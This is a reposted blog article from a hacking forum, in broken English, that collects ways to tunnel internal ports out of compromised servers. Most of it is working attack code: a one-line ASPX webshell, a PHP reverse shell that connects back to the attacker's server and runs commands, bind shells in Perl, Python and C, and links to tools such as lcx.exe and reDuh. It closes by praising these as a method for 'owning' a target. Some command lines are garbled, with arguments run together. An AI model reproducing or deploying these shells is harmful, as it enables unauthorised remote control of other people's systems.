首页 > 技术点滴 > 【转载】内网端口转发方法汇总

【转载】内网端口转发方法汇总

2014年5月25日 baoz 阅读评论

转载自习科 http://silic.org/post/Port_Forwarding_from_Intranet_Multiple_Collection

本篇文章由习科论坛会员小Dの马甲原创供稿,文章中将内网端口转发的方法进行了一些汇总,希望给大家带来启发。

I. Sample Baklinks with “lcx.exe”

first download lcx.exe from

  1. attach.blackbap.org/down/yclj/lcx.exe

the program only can running in Windows Server, the program can backlink 3389 to another server.

Opening and Listening a Port(like 3333) use lcx.exe on a Local Server, and Link 3333 port to 4444 port for Local:

  1. lcx.exe l 33334444

then command lcx on server, backlink the remote desktop port 3389

  1. lcx.exe s yourserverip 3333127.0.0.13389

 

 

the connection like this:

  1. target3389<<–>> remotelcx <<–>> yourserver3333<<–>> yourserver4444

if successed, connecting 127.0.0.1:4444 equal target:3389

 

II. Using ASPX Script Backlinks Remote Port

the tool can download at here:

  1. attach.blackbap.org/down/wzaq/ASPX.rar

before used it should done followings, has a ASPX webshell on target, and ASP.net can running well.

  1. <%@PageLanguage=“C#”ValidateRequest=“false” %>
  2. <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“psw”].Value))).CreateInstance(“c”,true,System.Reflection.BindingFlags.Default,null,newobject[]{this},null,null);}catch{}%>

and using lcx for a internet machine

at the end is setting

 

 

the picture backlinked the 14147 port, And the other no difference.

 

III. Using JSP Script with Socket
the JSP Script can download here:

  1. http://attach.blackbap.org/down/wzaq/jspdkzf.rar

the server should supports Java Environment, useage like following:

  1. target/jspdkzf.jsp?localIP=127.0.0.1&localPort=3389&remoteIP=yourserveripaddress&remotePort=3333

this script also can backlinks 3306(MySQL default port), 22(SSH default port)….

 

IV. Using PHP Script with Socket

 

the script supports Win server and Linux Server, it load socket package with dl() function,the code following:

  1. <?php
  2. function phpsocket(){
  3. @set_time_limit(0);
  4. $system=strtoupper(substr(PHP_OS,0,3));
  5. if(!extension_loaded(‘sockets’)){if($system==‘WIN’){@dl(‘php_sockets.dll’)ordie(“Can’t load socket”);}else{@dl(‘sockets.so’)ordie(“Can’t load socket”);}}
  6. if(isset($_POST[‘host’])&& isset($_POST[‘port’])){$host = $_POST[‘host’];$port = $_POST[‘port’];}
  7. else{
  8. print<<<SILIC
  9. <p>php_sockets setting openning<br></p>
  10. <form method=post action=”?”>
  11. Host:<input type=text name=host value=””><br>
  12. Port:<input type=text name=port value=”1120″><br><br>
  13. <input type=”radio” name=info value=”linux” checked>Linux <input type=”radio” name=info value=”win”>Windows <input class=”bt” type=submit name=submit value=”Backlink”><br>
  14. </form>
  15. SILIC;
  16. }
  17. if($system==“WIN”){$env=array(‘path’=>‘c:\\windows\\system32’);}
  18. else{$env = array(‘PATH’=>‘/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin’);}
  19. $descriptorspec = array(0=> array(“pipe”,“r”),1=> array(“pipe”,“w”),2=> array(“pipe”,“w”),);
  20. $host=gethostbyname($host);
  21. $proto=getprotobyname(“tcp”);
  22. if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die(“Socket Creat Failed”);}
  23. if(($ret=socket_connect($sock,$host,$port))<0){die(“Connect Failed”);}
  24. else{
  25. $message=“————-PHP Backlink, Silic Security————-\\n”;
  26. socket_write($sock,$message,strlen($message));
  27. $cwd=str_replace(‘\\’,‘/’,dirname(__FILE__));
  28. while($cmd=socket_read($sock,65535,$proto)){
  29. if(trim(strtolower($cmd))==“exit”){socket_write($sock,“Bye\n”);exit;}
  30. else{
  31. $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
  32. if(is_resource($process)){
  33. fwrite($pipes[0], $cmd);
  34. fclose($pipes[0]);
  35. $msg=stream_get_contents($pipes[1]);
  36. socket_write($sock,$msg,strlen($msg));
  37. fclose($pipes[1]);
  38. $msg=stream_get_contents($pipes[2]);
  39. socket_write($sock,$msg,strlen($msg));
  40. $return_value = proc_close($process);
  41. }
  42. }
  43. }
  44. }
  45. }
  46. @phpsocket();
  47. ?>

host in form is your server ip address, port in form is which you listening on your server.

 

 

the shell in the code can be changed.

 

V. 80/443 Port Multiplexing and Privilege Escalation
here is the tool, it supports ASPX/PHP/JSP Scripts.

  1. attach.blackbap.org/down/yclj/reDuh.rar

URL is reDuh Server Webshell, remote host can using default(127.0.0.1), remote port is which you want backlinks

 

 

any port with rules can used(default is port 1234), then creat the link on program, connect the default port 1234 on local
connect with local software or telnet or any program can connecting.
(the picture used a wrong shell for target)

 

VI. bind a port on target server
perl script

  1. #!/usr/bin/perl
  2. $os = $^O;
  3. $SHELL=“/bin/sh”;
  4. if($os =~ m/win/i){ $SHELL=“%COMSPEC% /K”;}
  5. if(@ARGV<1){exit(1);}
  6. $LISTEN_PORT=$ARGV[0];
  7. useSocket;
  8. $protocol=getprotobyname(‘tcp’);
  9. socket(S,&PF_INET,&SOCK_STREAM,$protocol)||die(“error\n”);
  10. setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
  11. bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY))||die(“error\n”);
  12. listen(S,3)||die“”;
  13. while(1)
  14. {
  15. accept(CONN,S);
  16. if(!($pid=fork))
  17. {
  18. die“Cannot fork”if(!defined $pid);
  19. open STDIN,“<&CONN”;
  20. open STDOUT,“>&CONN”;
  21. open STDERR,“>&CONN”;
  22. exec $SHELL ||die(“error\n”);
  23. close CONN;
  24. exit0;
  25. }
  26. }

python script

  1. #!/usr/bin/env python
  2. import os, sys, socket, time
  3. MAX_LEN=1024
  4. SHELL=“/bin/bash -c”
  5. TIME_OUT=300
  6. PORT=“”
  7. HOST=“”
  8. def shell(cmd):
  9. sh_out=os.popen(SHELL+” “+cmd).readlines()
  10. nsh_out=“”
  11. for i in range(len(sh_out)):
  12. nsh_out+=sh_out[i]
  13. return nsh_out
  14. def action(conn):
  15. whileTrue:
  16. try:
  17. pcmd=conn.recv(MAX_LEN)
  18. except:
  19. print(“error\n”)
  20. returnTrue
  21. else:
  22. cmd=“”
  23. for i in range(len(pcmd)-1):
  24. cmd+=pcmd[i]
  25. if cmd==“:dc”:
  26. returnTrue
  27. elif cmd==“:sd”:
  28. returnFalse
  29. else:
  30. if len(cmd)>0:
  31. out=shell(cmd)
  32. conn.send(out)
  33. argv=sys.argv
  34. if len(argv)==2:
  35. PORT=argv[1]
  36. elif len(argv)==3:
  37. PORT=argv[1]
  38. HOST=argv[2]
  39. else:exit(1)
  40. PORT=int(PORT)
  41. if os.fork()!=0:
  42. sys.exit(0)
  43. sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  44. sock.settimeout(TIME_OUT)
  45. if len(argv)==2:
  46. sock.bind((‘localhost’, PORT))
  47. sock.listen(0)
  48. run=True
  49. while run:
  50. if len(argv)==3:
  51. try: sock.connect((HOST, PORT))
  52. except:
  53. print(“error\n”)
  54. time.sleep(5)
  55. else: run=action(sock)
  56. else:
  57. try:(conn,addr)=sock.accept()
  58. except:
  59. print(“error\n”)
  60. time.sleep(1)
  61. else: run=action(conn)
  62. if len(argv)==2: conn.shutdown(2)
  63. else:
  64. try: sock.send(“”)
  65. except: time.sleep(1)
  66. else: sock.shutdown(2)

C Script

  1. #include<stdio.h>
  2. #include<string.h>
  3. #include<sys/types.h>
  4. #include<sys/socket.h>
  5. #include<netinet/in.h>
  6. #include<errno.h>
  7. int main(argc,argv)
  8. int argc;
  9. char**argv;{
  10. int sockfd, newfd;
  11. struct sockaddr_in remote;
  12. if(fork()==0){
  13. remote.sin_family = AF_INET;
  14. remote.sin_port = htons(atoi(argv[1]));
  15. remote.sin_addr.s_addr = htonl(INADDR_ANY);
  16. sockfd = socket(AF_INET,SOCK_STREAM,0);
  17. if(!sockfd) perror(“error\n”);
  18. bind(sockfd,(struct sockaddr *)&remote,0x10);
  19. listen(sockfd,5);
  20. while(1){
  21. newfd=accept(sockfd,0,0);
  22. dup2(newfd,0);
  23. dup2(newfd,1);
  24. dup2(newfd,2);
  25. execl(“/bin/sh”,“sh”,(char*)0);
  26. close(newfd);
  27. }
  28. }
  29. }
  30. int chpass(char*base,char*entered){
  31. int i;
  32. for(i=0;i<strlen(entered);i++)
  33. {
  34. if(entered[i]==‘\n’)
  35. entered[i]=‘\0’;
  36. if(entered[i]==‘\r’)
  37. entered[i]=‘\0’;
  38. }
  39. if(!strcmp(base,entered))
  40. return0;
  41. }

the usage is same

  1. script target port

C Script is best(I think), Opening and Binding a shell/Command line Port On Webshell, Forwarding and Making a Privilege Escalation is a Good Method for Owned a Target.

Silic Security,to be continued….
//silic.Org

分类: 技术点滴 标签: , ,
  1. 本文目前尚无任何评论.